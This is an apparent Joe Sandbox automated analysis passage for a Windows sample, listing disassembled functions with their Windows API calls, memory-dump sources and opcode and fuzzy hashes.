                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DC09
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0051DC2F
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0051DC32
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0051DC53
                                                                                                                      • SysFreeString.OLEAUT32 ref: 0051DC5C
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0051DC76
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0051DC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: a7166664d8e9df617cdd347be1d611df6d9128f0570c94e4f288055bdea26fe5
                                                                                                                      • Instruction ID: f3d519a25a5d2dd4dc64d8759b698567992fc3524aca894c3617961f35007878
                                                                                                                      • Opcode Fuzzy Hash: a7166664d8e9df617cdd347be1d611df6d9128f0570c94e4f288055bdea26fe5
                                                                                                                      • Instruction Fuzzy Hash: 89216035604204AFAB109FACDC88DEB7BECFB19364B108525F915CB260DAB4DC85DBB4
                                                                                                                      Function 005475CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004C1D73
                                                                                                                        • Part of subcall function 004C1D35: GetStockObject.GDI32(00000011), ref: 004C1D87
                                                                                                                        • Part of subcall function 004C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 004C1D91
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00547632
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0054763F
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0054764A
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00547659
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00547665
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: 96b12b0949a7e928efe940ea44ae6f9efc9f857262d75b6b87c8b79de1cd1612
                                                                                                                      • Instruction ID: af46b6caa7203aeea4886be13dd2e591f4edef11366e3a2e574ec0340d67e556
                                                                                                                      • Opcode Fuzzy Hash: 96b12b0949a7e928efe940ea44ae6f9efc9f857262d75b6b87c8b79de1cd1612
                                                                                                                      • Instruction Fuzzy Hash: FC1181B1110119BEEF118F64CC85EE77F6DFF08798F014115BA08A2060CB729C21DBA4
                                                                                                                      Function 004E9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __init_pointers.LIBCMT ref: 004E9AE6
                                                                                                                        • Part of subcall function 004E3187: EncodePointer.KERNEL32(00000000), ref: 004E318A
                                                                                                                        • Part of subcall function 004E3187: __initp_misc_winsig.LIBCMT ref: 004E31A5
                                                                                                                        • Part of subcall function 004E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004E9EA0
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004E9EB4
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004E9EC7
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004E9EDA
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004E9EED
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004E9F00
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004E9F13
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004E9F26
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004E9F39
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004E9F4C
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004E9F5F
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004E9F72
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004E9F85
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004E9F98
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004E9FAB
                                                                                                                        • Part of subcall function 004E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004E9FBE
                                                                                                                      • __mtinitlocks.LIBCMT ref: 004E9AEB
                                                                                                                      • __mtterm.LIBCMT ref: 004E9AF4
                                                                                                                        • Part of subcall function 004E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004E9AF9,004E7CD0,0057A0B8,00000014), ref: 004E9C56
                                                                                                                        • Part of subcall function 004E9B5C: _free.LIBCMT ref: 004E9C5D
                                                                                                                        • Part of subcall function 004E9B5C: DeleteCriticalSection.KERNEL32(02X,?,?,004E9AF9,004E7CD0,0057A0B8,00000014), ref: 004E9C7F
                                                                                                                      • __calloc_crt.LIBCMT ref: 004E9B19
                                                                                                                      • __initptd.LIBCMT ref: 004E9B3B
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004E9B42
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3567560977-0
                                                                                                                      • Opcode ID: 6d80f92e2cff7d76da3799e4f8d5cb2318eaa7eb3d60c8e35ba1cd2d88427499
                                                                                                                      • Instruction ID: 591745636291602055800ce2b7eab26b77b50c77e450aad47b790ee8b3cb02c0
                                                                                                                      • Opcode Fuzzy Hash: 6d80f92e2cff7d76da3799e4f8d5cb2318eaa7eb3d60c8e35ba1cd2d88427499
                                                                                                                      • Instruction Fuzzy Hash: 02F0C2329193D11EE7747B77BC03A8B2681AF0273BB20062FF414D51D2EE289C40416C
                                                                                                                      Function 0054B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0054B644
                                                                                                                      • _memset.LIBCMT ref: 0054B653
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00586F20,00586F64), ref: 0054B682
                                                                                                                      • CloseHandle.KERNEL32 ref: 0054B694
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                      • String ID: oX$doX
                                                                                                                      • API String ID: 3277943733-1145776732
                                                                                                                      • Opcode ID: b636b7d1d494f42c81d48d3d6159f40d0b810acba400e7270bb7534c69185b9b
                                                                                                                      • Instruction ID: c1a1bc679c4e4fc5e7c875f09c28c4a5c765b268d57c9ee92835725cb7750ce0
                                                                                                                      • Opcode Fuzzy Hash: b636b7d1d494f42c81d48d3d6159f40d0b810acba400e7270bb7534c69185b9b
                                                                                                                      • Instruction Fuzzy Hash: CAF05EB2540304BAE3102B66BC06FBB3E9CEB19799F005421BF08F5196D7B58C04D7A8
                                                                                                                      Function 004E406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004E3F85), ref: 004E4085
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004E408C
                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 004E4097
                                                                                                                      • DecodePointer.KERNEL32(004E3F85), ref: 004E40B2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                                      • Opcode ID: a52104e8323b98ccc629a4ac7ea4914578c73ec467827d9a6701ecaacc0af62a
                                                                                                                      • Instruction ID: 61b9f36cbf2d1d4bb6f81ebbb9ad364352d2c3c5d6f103c85cd0f511a39583e6
                                                                                                                      • Opcode Fuzzy Hash: a52104e8323b98ccc629a4ac7ea4914578c73ec467827d9a6701ecaacc0af62a
                                                                                                                      • Instruction Fuzzy Hash: 5BE0B678585300EFEB20AF65EC0DB863AA4B726F47F105426F941E11A0CBB6460CFB14
                                                                                                                      Function 005264B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253778849-0
                                                                                                                      • Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                                                                      • Instruction ID: 6f995524c6360459d618c4b0e912783bc1fd0726ca4644696895d1530a39c152
                                                                                                                      • Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                                                                      • Instruction Fuzzy Hash: 4E618C3450029AABCF01EF65C886EBE3BA5BF46308F04452EF8155B192DB79AC45CB54
                                                                                                                      Function 005401E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 00540E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005402BD
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005402FD
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00540320
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00540349
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0054038C
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00540399
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      • Opcode ID: fdb8b788653b4422afb3e638060440702da845df034930a820bcd0c1cecc51b2
                                                                                                                      • Instruction ID: 4b640f7fa350e17ea2076d9eb880958aece4507c8842ac5addca67370a2b60ff
                                                                                                                      • Opcode Fuzzy Hash: fdb8b788653b4422afb3e638060440702da845df034930a820bcd0c1cecc51b2
                                                                                                                      • Instruction Fuzzy Hash: 92517B35208200AFCB14EF64C889EAFBBE9FF85318F14491DF556872A2DB35E945CB52
                                                                                                                      Function 00545799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 005457FB
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00545832
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0054585A
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 005458C9
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 005458D7
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00545928
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      • Opcode ID: a7ecf2353716f308a2c64e4ff6c9a780ea7dc2e6951da6754e9257b58c0f47fd
                                                                                                                      • Instruction ID: 9414e5f8e011280c578e392891d208b83e241f9022998788621fbc02f3a474aa
                                                                                                                      • Opcode Fuzzy Hash: a7ecf2353716f308a2c64e4ff6c9a780ea7dc2e6951da6754e9257b58c0f47fd
                                                                                                                      • Instruction Fuzzy Hash: B0516B35A00615EFCF11AF65C845AEEBBB4FF49328F10446AE801AB252DB74AE419B94
                                                                                                                      Function 0051EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0051EF06
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 0051EF78
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0051EFD3
                                                                                                                      • _memmove.LIBCMT ref: 0051EFFD
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0051F04A
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0051F078
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      • Opcode ID: 7bd3baf8ec757ddcac9f3f7e5bc278e51a6ce2e3aa1c392c4843d0ba47e6d586
                                                                                                                      • Instruction ID: 56c915852514fa9133ce3645fb194be250e86a543daaa57e07246265bd0e3b60
                                                                                                                      • Opcode Fuzzy Hash: 7bd3baf8ec757ddcac9f3f7e5bc278e51a6ce2e3aa1c392c4843d0ba47e6d586
                                                                                                                      • Instruction Fuzzy Hash: 56513AB5A00209EFDB14CF58C884AAABBF8FF4C314B158569ED59DB301E735E951CBA0
                                                                                                                      Function 0052220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522258
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005222A3
                                                                                                                      • IsMenu.USER32(00000000), ref: 005222C3
                                                                                                                      • CreatePopupMenu.USER32 ref: 005222F7
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00522355
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00522386
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      • Opcode ID: 621d121373b588747ee75abf3cc3298cb79cacb376fbd2add1cf0063b43f6718
                                                                                                                      • Instruction ID: fa82e2b0195e481b0be2de81df54490c8ac51f5815f926bf32a88acb00d8d464
                                                                                                                      • Opcode Fuzzy Hash: 621d121373b588747ee75abf3cc3298cb79cacb376fbd2add1cf0063b43f6718
                                                                                                                      • Instruction Fuzzy Hash: CE51B23850026AFBDF25CF68E988BADBFF5BF66318F104929E811972D0D3788904CB51
                                                                                                                      Function 004C1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 004C179A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004C17FE
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004C181B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004C182C
                                                                                                                      • EndPaint.USER32(?,?), ref: 004C1876
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      • Opcode ID: 6ec534c14a6c14ab7f0cefbe9137a4a35c4fb785637e4476697c3d7b3f215c16
                                                                                                                      • Instruction ID: 24c0c2fdaf041a8152803c82ebe356230da8d1b45041fc51e7d7b572b4c3e04a
                                                                                                                      • Opcode Fuzzy Hash: 6ec534c14a6c14ab7f0cefbe9137a4a35c4fb785637e4476697c3d7b3f215c16
                                                                                                                      • Instruction Fuzzy Hash: C541B1381043009FD710EF25CC84FBA7BE8EB56324F14466EF994962B2D7349809DB66
                                                                                                                      Function 0054B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(005857B0,00000000,01085420,?,?,005857B0,?,0054B5A8,?,?), ref: 0054B712
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 0054B736
                                                                                                                      • ShowWindow.USER32(005857B0,00000000,01085420,?,?,005857B0,?,0054B5A8,?,?), ref: 0054B796
                                                                                                                      • ShowWindow.USER32(00000000,00000004,?,0054B5A8,?,?), ref: 0054B7A8
                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0054B7CC
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0054B7EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: 9e1ec8464b73d9dad4082e2b29d0d5041456e80e086f85b07a1bd43a02a4e3aa
                                                                                                                      • Instruction ID: a02f3116bab3fc5eda796c13de0918c5c92b35bdad8750587ce21f62f3f2277e
                                                                                                                      • Opcode Fuzzy Hash: 9e1ec8464b73d9dad4082e2b29d0d5041456e80e086f85b07a1bd43a02a4e3aa
                                                                                                                      • Instruction Fuzzy Hash: B8417D34600240AFEB26CF28C499BD57FE1FF85318F1841B9EA498F6A2C731E856CB51
                                                                                                                      Function 0053709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00534E41,?,?,00000000,00000001), ref: 005370AC
                                                                                                                        • Part of subcall function 005339A0: GetWindowRect.USER32(?,?), ref: 005339B3
                                                                                                                      • GetDesktopWindow.USER32 ref: 005370D6
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 005370DD
